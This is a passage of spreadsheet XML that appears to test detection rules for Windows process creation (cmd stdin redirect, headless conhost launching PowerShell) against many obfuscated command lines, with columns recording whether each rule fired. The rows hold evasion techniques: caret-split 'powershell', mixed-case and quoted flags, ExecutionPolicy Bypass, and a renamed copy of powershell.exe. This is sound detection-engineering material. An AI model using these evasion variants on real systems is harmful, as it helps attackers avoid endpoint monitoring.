    <row r="2376" ht="15.75" customHeight="1" s="42">
      <c r="A2376" s="43" t="n"/>
      <c r="B2376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_stdin_redirect</t>
        </is>
      </c>
      <c r="C2376" s="44" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D2376" s="44" t="inlineStr">
        <is>
          <t>241e802a-b65e-484f-88cd-c2dc10f9206d</t>
        </is>
      </c>
      <c r="E2376" s="44" t="inlineStr">
        <is>
          <t>for /f "tokens=*" %i in (payload.txt) do cmd.exe /c %i</t>
        </is>
      </c>
      <c r="F2376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2376" s="44" t="n"/>
      <c r="J2376" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2376" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2377" ht="15.75" customHeight="1" s="42">
      <c r="A2377" s="43" t="n"/>
      <c r="B2377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_stdin_redirect</t>
        </is>
      </c>
      <c r="C2377" s="44" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D2377" s="44" t="inlineStr">
        <is>
          <t>241e802a-b65e-484f-88cd-c2dc10f9206d</t>
        </is>
      </c>
      <c r="E2377" s="44" t="inlineStr">
        <is>
          <t>type payload.txt | cmd.exe</t>
        </is>
      </c>
      <c r="F2377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2377" s="44" t="n"/>
      <c r="J2377" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2377" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2378" ht="15.75" customHeight="1" s="42">
      <c r="A2378" s="43" t="n"/>
      <c r="B2378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2378" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2378" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2378" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2378" s="44" t="n"/>
      <c r="J2378" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2378" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2379" ht="15.75" customHeight="1" s="42">
      <c r="A2379" s="43" t="n"/>
      <c r="B2379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2379" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2379" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2379" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2379" s="44" t="n"/>
      <c r="J2379" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2379" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2380" ht="15.75" customHeight="1" s="42">
      <c r="A2380" s="43" t="n"/>
      <c r="B2380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2380" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2380" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2380" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2380" s="44" t="n"/>
      <c r="J2380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2380" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2381" ht="15.75" customHeight="1" s="42">
      <c r="A2381" s="43" t="n"/>
      <c r="B2381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2381" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2381" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2381" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2381" s="43" t="n"/>
      <c r="J2381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2381" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2382" ht="15.75" customHeight="1" s="42">
      <c r="A2382" s="43" t="n"/>
      <c r="B2382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2382" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2382" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2382" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2382" s="43" t="n"/>
      <c r="J2382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2382" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2383" ht="15.75" customHeight="1" s="42">
      <c r="A2383" s="43" t="n"/>
      <c r="B2383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2383" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2383" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2383" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2383" s="43" t="n"/>
      <c r="J2383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2383" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2384" ht="15.75" customHeight="1" s="42">
      <c r="A2384" s="43" t="n"/>
      <c r="B2384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2384" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2384" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2384" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2384" s="43" t="n"/>
      <c r="J2384" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2384" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2385" ht="15.75" customHeight="1" s="42">
      <c r="A2385" s="43" t="n"/>
      <c r="B2385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2385" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2385" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2385" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2385" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2385" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2386" ht="15.75" customHeight="1" s="42">
      <c r="A2386" s="43" t="n"/>
      <c r="B2386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2386" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2386" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2386" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F2386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2386" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2386" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2387" ht="15.75" customHeight="1" s="42">
      <c r="A2387" s="43" t="n"/>
      <c r="B2387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2387" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2387" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2387" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F2387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2387" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2387" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2388" ht="15.75" customHeight="1" s="42">
      <c r="A2388" s="43" t="n"/>
      <c r="B2388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2388" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2388" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2388" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2388" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2388" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2388" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2389" ht="15.75" customHeight="1" s="42">
      <c r="A2389" s="43" t="n"/>
      <c r="B2389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2389" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2389" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2389" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F2389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2389" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2390" ht="15.75" customHeight="1" s="42">
      <c r="A2390" s="43" t="n"/>
      <c r="B2390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2390" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2390" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2390" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F2390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2390" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2390" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2391" ht="15.75" customHeight="1" s="42">
      <c r="A2391" s="43" t="n"/>
      <c r="B2391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2391" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2391" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2391" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2391" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2392" ht="15.75" customHeight="1" s="42">
      <c r="A2392" s="43" t="n"/>
      <c r="B2392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2392" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2392" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2392" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F2392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2392" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2393" ht="15.75" customHeight="1" s="42">
      <c r="A2393" s="43" t="n"/>
      <c r="B2393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2393" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2393" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2393" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F2393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2393" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2394" ht="15.75" customHeight="1" s="42">
      <c r="A2394" s="43" t="n"/>
      <c r="B2394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2394" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2394" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2394" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F2394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2394" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2394" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2395" ht="15.75" customHeight="1" s="42">
      <c r="A2395" s="43" t="n"/>
      <c r="B2395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2395" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2395" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2395" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2395" s="44" t="n"/>
      <c r="J2395" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2395" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2396" ht="15.75" customHeight="1" s="42">
      <c r="A2396" s="43" t="n"/>
      <c r="B2396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2396" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2396" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2396" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2396" s="44" t="n"/>
      <c r="J2396" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2396" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2397" ht="15.75" customHeight="1" s="42">
      <c r="A2397" s="43" t="n"/>
      <c r="B2397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2397" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2397" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2397" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2397" s="44" t="n"/>
      <c r="J2397" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2397" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2398" ht="15.75" customHeight="1" s="42">
      <c r="A2398" s="43" t="n"/>
      <c r="B2398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2398" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2398" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2398" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2398" s="44" t="n"/>
      <c r="J2398" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2398" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2399" ht="15.75" customHeight="1" s="42">
      <c r="A2399" s="43" t="n"/>
      <c r="B2399" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2399" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2399" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2399" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2399" s="44" t="n"/>
      <c r="J2399" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2399" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2400" ht="15.75" customHeight="1" s="42">
      <c r="A2400" s="43" t="n"/>
      <c r="B2400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2400" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2400" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2400" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2400" s="44" t="n"/>
      <c r="J2400" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2400" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2401" ht="15.75" customHeight="1" s="42">
      <c r="A2401" s="43" t="n"/>
      <c r="B2401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2401" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2401" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2401" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2401" s="44" t="n"/>
      <c r="J2401" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2401" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2402" ht="15.75" customHeight="1" s="42">
      <c r="A2402" s="43" t="n"/>
      <c r="B2402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2402" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2402" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2402" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2402" s="44" t="n"/>
      <c r="J2402" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2402" s="44" t="b">
